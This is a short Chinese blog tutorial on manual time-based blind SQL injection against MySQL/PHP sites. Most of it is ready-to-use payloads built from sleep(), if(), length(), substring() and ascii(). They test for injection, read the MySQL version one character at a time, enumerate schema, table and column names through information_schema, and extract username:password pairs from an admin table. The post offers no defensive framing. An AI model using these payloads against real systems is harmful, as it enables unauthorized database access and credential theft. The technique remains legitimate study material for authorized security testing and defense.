vlambda博客
学习文章列表

mysql+php手工注入-延时注入

延时注入属于盲注的一种,这种注入通过mysql中的 sleep()函数,进行延时

sleep() 通常与 if 一起使用

例如:select  if(1=1,sleep(3),0)  意思是 如果1=1,就延时3s,否则为0

延时注入的方法是 先获取数据的长度,再用长度查询内容

判断注入

and sleep(3):如果存在注入,页面会延时3s

获取mysql版本

先判断版本长度,再对每一个字符进行判断

length()  查询长度
substring()  截取字符
ascii()  ascii码
id=1 and if(length(version())=6,sleep(3),0)

and if(ascii(substring(version(),1,1))=53,sleep(5),0)
and if(ascii(substring(version(),2,1))=46,sleep(5),0)
and if(ascii(substring(version(),3,1))=53,sleep(5),0)
and if(ascii(substring(version(),4,1))=46,sleep(5),0)
and if(ascii(substring(version(),5,1))=52,sleep(5),0)
and if(ascii(substring(version(),6,1))=54,sleep(5),0)

获取库名

and if(length((select schema_name from information_schema.schemata limit 0,1))=10,sleep(5),0)

and if(ascii(substring((select schema_name from information_schema.schemata limit 0,1),1,1))=105,sleep(5),0)

获取表名

and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=34,sleep(5),0)

and if(ascii(substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=100,sleep(5),0)

获取字段

if(LENGTH((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x61646d696e))=20,sleep(5),0)

if(ascii(SUBSTRING((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME=0x61646d696e),1,1))=105,sleep(5),0)

获取数据

if(LENGTH((select GROUP_CONCAT(username,0x3a,password)from admin))=38,sleep(5),5)

if(ascii(substring((select GROUP_CONCAT(username,0x3a,password)from admin),1,1))=105,sleep(5),5)